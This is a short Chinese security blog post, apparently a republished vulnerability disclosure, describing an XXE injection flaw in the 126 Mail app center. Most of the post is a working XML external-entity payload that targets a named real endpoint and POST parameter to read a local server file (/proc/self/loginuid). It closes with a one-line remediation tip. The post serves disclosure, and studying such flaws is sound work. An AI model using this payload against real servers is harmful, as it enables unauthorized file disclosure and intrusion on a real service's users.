http://uswebmail.mail.126.com/appcenter/ftentry.do?sid=XXXXXXXXXXX&func=mapp:sequential典型的XXE注入,POST参数var

126邮箱应用中心XXE注入漏洞 – 网站安全 – 自学p插图

<?xml version="1.0"?><!DOCTYPE object [ <!ELEMENT string ANY> <!ENTITY xx1 SYSTEM "file:///proc/self/loginuid"> ]><object><array name="items"><object><string name="func">mapp:listBanners</string><object name="var"><int name="position">0</int></object></object><object><string name="func">mapp:&xx1;</string></object></array></object>

 

126邮箱应用中心XXE注入漏洞 – 网站安全 – 自学p插图1
126邮箱应用中心XXE注入漏洞 – 网站安全 – 自学p插图2
 

漏洞修复建议:

使用libxml_disable_entity_loader 等函数

    上一篇: 优酷主站stored xss可执行任意js代码 - 网站安全

    下一篇: phpwind9.0最新版富文本存储型XSS漏洞 - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《126邮箱应用中心XXE注入漏洞 – 网站安全 – 自学p
   

还没有人抢沙发呢~